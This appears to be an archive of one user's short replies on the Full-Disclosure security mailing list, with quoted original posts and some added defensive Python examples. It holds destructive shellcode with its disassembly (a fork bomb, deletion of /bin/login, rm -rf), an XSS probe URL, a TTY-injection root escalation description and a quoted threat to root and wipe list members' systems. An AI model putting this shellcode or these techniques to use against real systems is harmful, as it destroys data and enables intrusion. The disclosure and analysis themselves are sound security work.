Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
agreed. That's one of the reasons why I've permanently closed my FB account some time ago ...

-Nik

On 01/20/2012 05:26 AM, maxigas wrote:
> From: Wesley Kerfoot
> Subject: [Full-disclosure] Facebook seems to think my Arch Linux box has
> malware on it
> Date: Thu, 19 Jan 2012 22:13:06 -0500
>
>> The message here for Facebook is that they shouldn’t implement systems that
>> they can’t support when they fail.
>
> Here the message for users is that they shouldn't rely on system they can't
> fix (together) when they fail. :P
>
> maxigas
>
> --
>
> The opinions expressed in this email are not mine.
>
> Magic: http://maxigas.hu/maxigas.gpg
> EE2E D824 B5C3 4544 C2B8 B75F 2183 52B5 8EC1 57C1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New awstats.pl vulnerability?
Same here, I even tried to notify a bunch of the ISP registrars of the IP address range those originated from.

-Nik

On 12/13/2011 07:30 AM, Bruce Ediger wrote:
> On Mon, 12 Dec 2011, Lamar Spells wrote:
>
>> For the past several days, I have been seeing thousands of requests
>> looking for awstats.pl like this one:
>
> Yeah, me too. They just started up. I haven't seen any awstats.pl
> requests since 2010-05-18, and now I've gotten batches of them, since
> about 2011-11-22, but heavier since the start of December.
Re: [Full-disclosure] NEVER AGAIN
Can you please stop this?

Thanks

On 11/22/2011 09:48 AM, xD 0x41 wrote:
> You fucking pieces of shit forget when it was once me who was asking,
> for help in regards to mutiple things, and when offered NONE, in
> regards to code i later had to find thanks to fucking blakhatz, why
> the fuck would i want or care for this list now, forget any
> competition i ever started, you clearly want, and, forget to see, even
> when it maybe something small for YOU, it maybe NOT for me, yet, i am
> hit from every side, nonstop about shit, wich i KNOW there is plenty
> of you who also have these codes, and thats exactly why your stfu and
> lettin me cop it.Seriously, when i was the one askin , i made NO big
> deal, when i was mutiple times confronted with exactly how i acted,
> and that was simply to NOT show things, because i did this per person
> basis, if i knew i could trust, then they were shown things..and they
> will always be shown things, as they remain friends.. the rest of you
> who shot your mouths of, watch the hell out, coz you may find a new
> user on your system soon called 'arsehole' and all he wants todo is
> get root, sdo he can rm it. a nice fuckign wurm you all deserve...
> harvesting of your domains, those who spoke out and, bombed me for
> shitall, and helped me not one bit when i had my ass on the line for
> shit like freepbx :s screw this list, believe it, i will root the
> people who annoyed me, one by one, and yes, ill FD that.
> now, fuck you all, except the very few, who know who they are . the
> rest of you who ignored me, and now dare to backlash chat me about a
> crappy bash 0day you DONT have,. go fk yourselfs, and for valdis, i
> hope your vt.edu, has a whole slew of new users you suckm as any
> kind of friend or moderator your also, the BIGGEST liar, who
> cannot code a thing, on this fucking list.
> dick.
> as for root@fibertel, indeed stfu, it was me on the ophone, just know
> that, your job is gone.
Re: [Full-disclosure] Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)
Hi,

This one works like a charm on my debian stable:

LimitRequestFieldSize 200

in the apache2.conf as global directive for all vhosts.

Cheers,
-Nik

On 08/26/2011 05:56 PM, bodik wrote:
> On 08/26/11 13:26, bodik wrote:
>> Option 2: (Pre 2.2 and 1.3)
>> # Reject request when more than 5 ranges in the Range: header.
>> # CVE-2011-3192
>> #
>> RewriteEngine on
>> RewriteCond %{HTTP:range} !(bytes=[^,]+(,[^,]+){0,4}$|^$)
>> # RewriteCond %{HTTP:request-range} !(bytes=[^,]+(?:,[^,]+){0,4}$|^$)
>> RewriteRule .* - [F]
>>> ^^ Better use this:
>>>
>>> RewriteEngine on
>>> RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC,OR]
>>> RewriteCond %{HTTP:request-range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC]
>>> RewriteRule .* - [F]
>>>
>>
>> in any case, i found very weird behavior on some of our webservers. as we
>> applied the first version of workaround, something about 15% of our webpages
>> seems to be broken, but the rest of virtual hosts were working fine.
>
> because of messing with Options FollowSymLinks or SymLinksIfOwnerMatch and
> mod_rewrite i have to implement other workaround ..
>
> b
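The two workarounds in this thread can be compared side by side before rollout. The following is an added example, not code from any poster in the thread: it re-implements the quoted "Better use this" RewriteCond pattern with Python's `re` and models `LimitRequestFieldSize 200` as a per-field length check. The sample requests, the host name `www.example.org` and the assumption that the limit is compared against the whole `Name: value` line are constructed for illustration.

```python
import re

# CondPattern from the "Better use this" rules quoted above. RewriteCond does
# an unanchored regex search, so the ^ and $ inside the pattern do the
# anchoring; [NC] makes the match case-insensitive.
RANGE_OK = re.compile(r"(^bytes=[^,]+(,[^,]+){0,4}$|^$)", re.IGNORECASE)


def rewrite_forbids(headers):
    """True if the quoted rule set would answer 403 ([F]) for this request.

    %{HTTP:name} expands to "" when the header is absent, which the ^$
    alternative accepts. Each condition is negated with "!" and the two are
    joined with [OR], so one header that fails the pattern is enough.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    return any(
        not RANGE_OK.search(lowered.get(name, ""))
        for name in ("range", "request-range")
    )


def oversized_fields(headers, limit=200):
    """Names of header fields a LimitRequestFieldSize of `limit` would reject.

    Assumption: the limit is compared against the whole "Name: value" line.
    The directive applies to every request header field, not only Range.
    """
    return [
        name for name, value in headers.items()
        if len(f"{name}: {value}".encode("latin-1")) > limit
    ]


# Constructed sample requests (header dictionaries), not captured traffic.
SAMPLES = {
    "plain GET": {"Host": "www.example.org"},
    "resumed download": {"Host": "www.example.org", "Range": "bytes=1000-"},
    "five ranges": {"Range": "bytes=0-1,2-3,4-5,6-7,8-9"},
    "mixed-case unit": {"Range": "Bytes=0-99"},
    "six short ranges": {"Range": "bytes=0-1,2-3,4-5,6-7,8-9,10-11"},
    "legacy header": {"Request-Range": "bytes=0-1,2-3,4-5,6-7,8-9,10-11"},
    "sixty ranges": {
        "Range": "bytes=" + ",".join(f"{i}-{i + 9}" for i in range(0, 600, 10))
    },
    "long session cookie": {
        "Host": "www.example.org",
        "Cookie": "session=" + "a" * 300,
    },
}


def evaluate(samples=SAMPLES):
    """Map each sample to (forbidden_by_rewrite, fields_over_the_limit)."""
    return {
        label: (rewrite_forbids(h), oversized_fields(h))
        for label, h in samples.items()
    }


if __name__ == "__main__":
    for label, (forbidden, too_long) in evaluate().items():
        verdict = "403" if forbidden else "pass"
        size = "400 " + ",".join(too_long) if too_long else "pass"
        print(f"{label:22} rewrite={verdict:5} fieldsize={size}")
```

The output shows the trade-off: the rewrite rules count ranges and leave other headers alone, while the 200-byte field limit only bounds the Range header indirectly and also rejects ordinary requests that carry a long Cookie or similar header.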
Re: [Full-disclosure] here
Thanks Andrew! Nice catch! ;-)

Cheers,
-Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
>
>> char sc[] =
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>> "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>> "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>> "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>> "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>> "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>> "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>> "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>> "\x04\x0B\xCD\x80";
>
>
> Abbreviated disassembly:
>    signal(SIGHUP, SIG_IGN)
>    something that looks like a 15-level deep fork() bomb
>    something involving kill()
>    unlink("/bin/login")
>    execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
>
> You could at least try to obfuscate your constants a little better.
> That was way too easy.
Re: [Full-disclosure] peace
so?

-Nikolay

fabio wrote:
> https://intranet.usip.org/datacenter/eps/CustomCal.php
Re: [Full-disclosure] password hash
Nice explanation Vladis, thanks!

Cheers,
-Nikolay

[EMAIL PROTECTED] wrote:
> Wow Vladis shut the fuck up
>
> On Fri, 05 Oct 2007 10:35:36 -0400 [EMAIL PROTECTED] wrote:
>
>> On Thu, 04 Oct 2007 22:22:14 EDT, Brian Toovey said:
>>
>>> Does anyone know what kind of password hash this is?
>>> 'password1' =
>>> &c6;Ub&c3;&ab;&19;a&cf;&86;
>>>
>> Hex format would be less likely to be mis-parsed. I'm *guessing* you
>> mean the hash is x'c65562c3 ab1961cf 86' - which is slightly odd, being
>> 72 bits long. A salted 64-bit hash, perhaps? Or it might be some home-grown
>> hash that somebody invented.
>>
>> If you know what 'password1' hashes to, it's time to do some differential
>> cryptography and try hashing 'password2', 'password11', 'passwor111', and so
>> on, to determine how many input characters the hash considers. The next thing
>> to try is hashing 'qassword1' (which has one bit different from 'password1')
>> and seeing how many of the output bits change, which will tell you the relative
>> strength of the hash. A good hash will have about half the bits change on a
>> one-bit difference (and continuing through q, r, s, t and so on won't reveal
>> any pattern of *which* bits change), while a bad hash will fail to cause a bit
>> cascade and only a few bits will be different in the output.
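The two probes described in the quoted explanation (how many input characters the hash considers, and how many output bits change for a one-bit input change) can be scripted against any hash you can call as an oracle. The following is an added example, not part of the original thread: `sha256_72`, `xor_fold_72` and `first8_72` are constructed stand-ins with the same 72-bit output length as the value in the question, not the unknown hash itself.

```python
import hashlib


def sha256_72(data):
    """Stand-in for a well-mixed hash: SHA-256 truncated to 72 bits."""
    return hashlib.sha256(data).digest()[:9]


def xor_fold_72(data):
    """Constructed weak 'home-grown' hash: XOR each byte into a 9-byte state."""
    state = bytearray(9)
    for i, byte in enumerate(data):
        state[i % 9] ^= byte
    return bytes(state)


def first8_72(data):
    """Constructed hash that silently ignores everything after 8 characters."""
    return sha256_72(data[:8])


def bits_changed(a, b):
    """Hamming distance between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche(hash_fn, base=b"password1"):
    """Average fraction of output bits that flip when one input bit flips.

    Generalises the 'qassword1' probe: every single-bit change of `base`
    is tried, not only the low bit of the first character.
    """
    ref = hash_fn(base)
    flipped = total = 0
    for pos in range(len(base)):
        for bit in range(8):
            probe = bytearray(base)
            probe[pos] ^= 1 << bit
            flipped += bits_changed(ref, hash_fn(bytes(probe)))
            total += len(ref) * 8
    return flipped / total


def considered_chars(hash_fn, probe=b"password11111111"):
    """Number of leading input positions that influence the output at all."""
    ref = hash_fn(probe)
    count = 0
    for pos in range(len(probe)):
        changed = bytearray(probe)
        changed[pos] ^= 0x01
        if hash_fn(bytes(changed)) == ref:
            break  # changing this character made no difference
        count += 1
    return count


if __name__ == "__main__":
    for fn in (sha256_72, xor_fold_72, first8_72):
        print(f"{fn.__name__:12} avalanche={avalanche(fn):.3f} "
              f"chars_considered={considered_chars(fn)}")
```

A well-mixed function lands near 0.5 and considers every character; the XOR fold flips exactly one output bit per input bit, and the truncating function stops reacting after the eighth character, so 'password1' and 'password2' collide.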
Re: [Full-disclosure] A Request To Everyone
I'd request that all of you stop fighting and leave the list to deal with what it's meant to.

Cheers,
-Nikolay

[EMAIL PROTECTED] wrote:
> I'm in favor of booting them all off the list. Let 'em keep their flame wars
> on EFNet.
>
> Geoff
>
> Sent from my BlackBerry wireless handheld.
>
> -----Original Message-----
> From: Aditya K Sood <[EMAIL PROTECTED]>
>
> Date: Thu, 20 Sep 2007 12:57:57
> To:full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] A Request To Everyone
>
>
> Hi
>
> After looking at the mail wars , I want to say only two lines.
>
> I dont know who Meta Info is , Lamer Buster is , LSNN is and all.
> I dont know how they are generating mails and putting my name
> everywhere. Thats it.
>
> Thanks to all.
>
> Regards
> Aks
Re: [Full-disclosure] Skype - the voip company
Hello,

It does not seem to be OS dependent, as I am running debian lenny/sid using skype version 1.4 Beta and it cannot connect.

Cheers,
-Nik

Tonu Samuel wrote:
> On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote:
>> Hello Simon
>>
>> Simon Smith wrote:
>>> Greetings,
>>> Does anyone know any more details about the current skype outage, other
>>> than what is being presented on their web-site? It appears that all
>> I guess "Problems with Skype login" [1] does tell a little bit more.
>>
>>    [1]
>> http://heartbeat.skype.com/2007/08/problems_with_skype_login.html
>
> Still no one exactly knows what is going on. But there are speculations
> that Microsoft intentionally broke it with latest patches and Skype
> working hard to find solution.
>
> I do not have anything better than all others, so take it as rumour only
> and think twice if you use closed source including windows or skype.
>
>    Tõnu
Re: [Full-disclosure] youtube flagged content age verification bypass
excellent find ;-)

cheers,
-Nik

----- Original Message -----
From: <[EMAIL PROTECTED]>
To:
Cc: <[EMAIL PROTECTED]>
Sent: Friday, June 29, 2007 3:32 PM
Subject: [Full-disclosure] youtube flagged content age verification bypass

> Youtube.com requires account creation and login before allowing
> visitors to view videos flagged by users as inappropriate.
>
> Sample flagged video: http://www.youtube.com/watch?v=Chei2buYo9s
> "This video may contain content that is
> inappropriate for some users, as flagged by YouTube's user
> community.
> To view this video, please verify you are 18 or older by logging in
> or signing up."
>
> alternatively, visit http://www.youtube.com/v/Chei2buYo9s
Re: [Full-disclosure] DOS on phrack?
seems up to me as of this moment,

-nik

----- Original Message -----
From: "Aditya K Sood" <[EMAIL PROTECTED]>
To: "scott" <[EMAIL PROTECTED]>;
Sent: Sunday, July 01, 2007 9:59 PM
Subject: Re: [Full-disclosure] DOS on phrack?

> Yup scott
> the problem is there.
>
> Regards
> Aditya K Sood
> http://www.secniche.org
>
> scott wrote:
> > It seems that Phrack.org is experiencing a serious DoS.I tried a few
> > times to connect today to no avail.
> >
> > Not to increase traffic to the DoS,is anyone else also experiencing the
> > same?
> >
> > Regards,
> >    Scott
Re: [Full-disclosure] Paper: Secure file upload in PHP web applications
Very nice presentation. Thanks a lot for sharing with us.

Regards,
-Nikolay Kichukov

Alla Bezroutchko wrote:
> Various web applications, such as blogs, forums and photo galleries
> allow users to upload files. Providing file upload function without
> opening security holes proved to be quite a challenge in PHP web
> applications. The applications we have tested suffered from a variety of
> security problems, ranging from arbitrary file disclosure to remote
> arbitrary code execution.
>
> The paper describes various security holes occurring in file upload
> implementations and suggests a way to implement a secure file upload.
>
> The paper can be downloaded from
> http://www.scanit.be/uploads/php-file-upload.pdf
>
> Regards,
> Alla Bezroutchko
> Scanit
> http://www.scanit.be/
Re: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access viaspecialy crafted html file
Exploit works like a charm on FF 2.0.3 on win2k sp4.

Regards,
-Nikolay Kichukov

----- Original Message -----
From: "carl hardwick" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, May 01, 2007 10:26 AM
Subject: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access viaspecialy crafted html file

> Product: Firefox 2.0.0.3
> Description: Out-of-bounds memory access via specially crafted html file
> Type: Remote
>
> Vulnerability can be exploited by using a large value in a href tag to
> create an out-of-bounds memory access.
>
> Proof Of Concept exploit:
> http://www.critical.lt/research/opera_die_happy.html
Re: [Full-disclosure] Internet Explorer Crash
Also works on IE 6.0.2800

-nik

----- Original Message -----
From: "J. Oquendo" <[EMAIL PROTECTED]>
To: "full-disclosure"
Sent: Tuesday, April 17, 2007 8:09 PM
Subject: [Full-disclosure] Internet Explorer Crash
Re: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability
It would've been nice if that was in English... Anyways, seems to be a nice review..

-nik

----- Original Message -----
From: "Julien Dhaille" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, April 17, 2007 12:29 PM
Subject: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability

> I wrote a paper about Xss exploitation with this bug.
> http://wargan.org/index.php/2007/04/16/9-dotclear-126-hijack-authenticated-session
Re: [Full-disclosure] A lot of XSS
yes, they seem already fixed, all of them ;_P) Congratulations on the good work.

-Nikolay Kichukov

----- Original Message -----
From: "Hanno Böck" <[EMAIL PROTECTED]>
To:
Sent: Friday, March 30, 2007 4:18 PM
Subject: [Full-disclosure] A lot of XSS
Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability
Hello Aditya,

I see your point there. Hope they get it fixed. Should the patch involve some referrer checking?

Regards,
-Nikolay Kichukov

----- Original Message -----
From: "Aditya K Sood" <[EMAIL PROTECTED]>
To: "Nikolay Kichukov" <[EMAIL PROTECTED]>;
Sent: Thursday, March 29, 2007 7:40 PM
Subject: Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability

> Nikolay Kichukov wrote:
> > Hello there,
> > I've read the article, but I still do not see where the severe redirection
> > vulnerability is. Is this not a feature of the neworder.box.sk web site to
> > allow anyone to be redirected to anypage they submit to redirect.php?
> >
> > Thanks,
> > -Nikolay Kichukov
> >
> >
> > ----- Original Message -----
> > From: "Aditya K Sood" <[EMAIL PROTECTED]>
> > To:
> > Sent: Wednesday, March 28, 2007 8:49 PM
> > Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe
> > RedirectionVulnerability
> >
> >
> >
> >> Hi
> >>
> >> Previous Rootkit.com Vulnerability have been patched.
> >> The neworder.box.sk is famous security website.It inherits very specific
> >> redirection attacks. The domain forwarding or URL forwarding not only
> >> directly possible through the website but can be called from third party
> >> directly.
> >>
> >> A very generic analysis have been undertaken based on search engine
> >> specification.Look into the issues at:
> >>
> >> http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html
> >> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml
> >>
> >> Regards
> >> Zeroknock
> >> http://zeroknock.metaeye.org/mlabs
> >
> Hi nikolay
>
>    Thats where the thinking is bit off side. Remember there
> is lot of difference between redirection occurs from the main website
> through generating event and the redirection that occurs from the third
> party.It will be okay to the feature context if the redirection supports
> only from the website.
>
> More precisely a search engine check is performed at the top to show
> that the page is not subjected as standard page for redirection. If its
> a feature than it must not be redirected from the third party.
>
> Thats All.
>
> Regards
> Adi
Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability
Hello there,

I've read the article, but I still do not see where the severe redirection vulnerability is. Is this not a feature of the neworder.box.sk web site to allow anyone to be redirected to anypage they submit to redirect.php?

Thanks,
-Nikolay Kichukov

----- Original Message -----
From: "Aditya K Sood" <[EMAIL PROTECTED]>
To:
Sent: Wednesday, March 28, 2007 8:49 PM
Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability

> Hi
>
> Previous Rootkit.com Vulnerability have been patched.
> The neworder.box.sk is famous security website.It inherits very specific
> redirection attacks. The domain forwarding or URL forwarding not only
> directly possible through the website but can be called from third party
> directly.
>
> A very generic analysis have been undertaken based on search engine
> specification.Look into the issues at:
>
> http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html
> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml
>
> Regards
> Zeroknock
> http://zeroknock.metaeye.org/mlabs
Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)
Hello Richard,

Seems to me I have also been so unprotected for this long ... I love the debian project and hope it is not going to an end... However I already use apache2 for all my machines.

Regards,
-Nikolay Kichukov

----- Original Message -----
From: "Richard Thrippleton" <[EMAIL PROTECTED]>
To: "Nikolay Kichukov" <[EMAIL PROTECTED]>
Cc:
Sent: Tuesday, February 27, 2007 3:37 AM
Subject: Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)

> On Mon Feb 26 21:15, Nikolay Kichukov wrote:
> > Lool,
> > how long has this bug been around?
> Almost a year, looking at that original patch that caused the problem. To be
> fair, nobody had commented on the security issues until I stumbled across them
> a month ago though.
>
> > Sounds scary.
> Yeah, scared me when I first saw it and realised how vulnerable I'd been for so
> long. What's also scary is the complete lack of action on what is a fairly
> serious problem. I used to think that the Debian project had a sane attitude to
> security. Maybe all the good developers have gone to Ubuntu.
>
> Richard
Re: [Full-disclosure] XSS at Aon.at, Austrian ISP
seems already fixed ... good job.

-Nikolay Kichukov

----- Original Message -----
From: "Florian Stinglmayr" <[EMAIL PROTECTED]>
To: ;
Sent: Tuesday, March 13, 2007 10:09 AM
Subject: [Full-disclosure] XSS at Aon.at, Austrian ISP

> Here we go:
>
> http://jawe.aon.at/search/aon.sp?query=alert(1);
>
> The issue has been reported to AON before.
>
> Regards,
> Florian Stinglmayr
Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)
Lool,
how long has this bug been around?

Sounds scary.

-nik

On Mon, February 26, 2007 8:11 pm, Richard Thrippleton wrote:
> Version 1.3.34-4 of Apache in the Debian Linux distribution contains a
> hole that allows a local user to access a root shell if the webserver has
> been restarted manually. This bug does not exist in the upstream apache
> distribution, and was patched in specifically by the Debian distribution.
> The bug report is located at
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of
> writing (over a month since the root hole was clarified), there has been
> no official acknowledgement. It is believed that most of the developers
> are tied up in more urgent work, getting the TI-86 distribution of Debian
> building in time for release.
>
> Unlike every other daemon, apache does not abdicate its controlling tty
> on startup, and allows it to be inherited by a cgi script (for example, a
> local user's CGI executed using suexec). When apache is manually
> restarted, the inherited ctty is the stdin of the (presumably root) shell
> that invoked the new instance of apache. Any process is permitted to
> invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows
> it to inject characters that appear to come from the terminal master.
> Thus, a user created CGI script can inject and have executed any input
> into the shell that spawned apache.
>
> As a Debian user, this concerns me greatly, as any non-privileged user
> would be able to install non-free documentation (GFDL) on any system I
> run.
>
> Richard
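The condition described in the quoted advisory, a daemon that keeps the controlling terminal of the shell that started it, is visible in field 7 (`tty_nr`) of `/proc/<pid>/stat` on Linux. The following is an added example, not code from the thread or from Debian: it flags processes that have been reparented to init (or descend from such a process) and still hold a controlling tty. The sample stat lines and process names are constructed, and the "parent is PID 1" heuristic for a daemon is an assumption.

```python
import glob


def parse_stat(line):
    """Return (pid, comm, ppid, tty_nr) from one /proc/<pid>/stat line.

    comm is wrapped in parentheses and may itself contain spaces or ')',
    so split on the LAST ')' instead of on whitespace.
    """
    lpar, rpar = line.index("("), line.rindex(")")
    rest = line[rpar + 1:].split()  # state ppid pgrp session tty_nr ...
    return int(line[:lpar]), line[lpar + 1:rpar], int(rest[1]), int(rest[4])


def tty_name(tty_nr):
    """Decode tty_nr: major in bits 15-8, minor in bits 31-20 and 7-0."""
    if tty_nr == 0:
        return None  # no controlling terminal
    major = (tty_nr >> 8) & 0xFFF
    minor = (tty_nr & 0xFF) | ((tty_nr >> 12) & 0xFFF00)
    if 136 <= major <= 143:
        return f"pts/{(major - 136) * 256 + minor}"
    if major == 4:
        return f"tty{minor}" if minor < 64 else f"ttyS{minor - 64}"
    return f"{major}:{minor}"


def find_ctty_holders(stat_lines):
    """List (pid, comm, tty) for daemonized process trees that hold a tty."""
    procs = {}
    for line in stat_lines:
        pid, comm, ppid, tty_nr = parse_stat(line)
        procs[pid] = (comm, ppid, tty_nr)

    def daemon_root(pid):
        # Walk up to the ancestor whose parent is init (PID 1), if any.
        seen = set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            if procs[pid][1] == 1:
                return pid
            pid = procs[pid][1]
        return None

    hits = []
    for pid in sorted(procs):
        comm, _ppid, tty_nr = procs[pid]
        root = daemon_root(pid)
        # Flag only when the daemon itself kept the terminal; an interactive
        # shell under sshd has a tty but its root (sshd) does not.
        if tty_nr and root is not None and procs[root][2]:
            hits.append((pid, comm, tty_name(tty_nr)))
    return hits


def scan_proc():
    """Run the same check against the live /proc of this machine (Linux)."""
    lines = []
    for path in glob.glob("/proc/[0-9]*/stat"):
        try:
            with open(path) as handle:
                lines.append(handle.read())
        except OSError:
            continue  # process exited while we were scanning
    return find_ctty_holders(lines)


# Constructed sample: a web server restarted by hand from a shell on pts/1.
SAMPLE = [
    "1 (init) S 0 1 1 0 -1 4194560",
    "1433 (sshd) S 1 1433 1433 0 -1 4194560",
    "2100 (sshd) S 1433 2100 2100 0 -1 4194624",
    "2107 (bash) S 2100 2107 2107 34817 2107 4194304",
    "2211 (apache) S 1 2211 2107 34817 2107 4194368",
    "2290 (apache) S 2211 2211 2107 34817 2107 4194368",
    "2304 (status (v2).cgi) S 2290 2211 2107 34817 2107 4194304",
]

if __name__ == "__main__":
    for pid, comm, tty in find_ctty_holders(SAMPLE):
        print(f"pid {pid} ({comm}) still holds controlling tty {tty}")
```

On the constructed sample the interactive `bash` is not reported, while the hand-restarted server and the CGI child that inherited its terminal are.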
Re: [Full-disclosure] What happens to Your Computer if you MispellGoogle.com
I agree ;-)

----- Original Message -----
From: "pdp (architect)" <[EMAIL PROTECTED]>
To: ; "Web Security" <[EMAIL PROTECTED]>
Sent: Sunday, January 21, 2007 1:44 PM
Subject: [Full-disclosure] What happens to Your Computer if you MispellGoogle.com

> http://www.gnucitizen.org/blog/what-happens-to-your-computer-if-you-mispell-googlecom
>
> it is worth seeing this
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org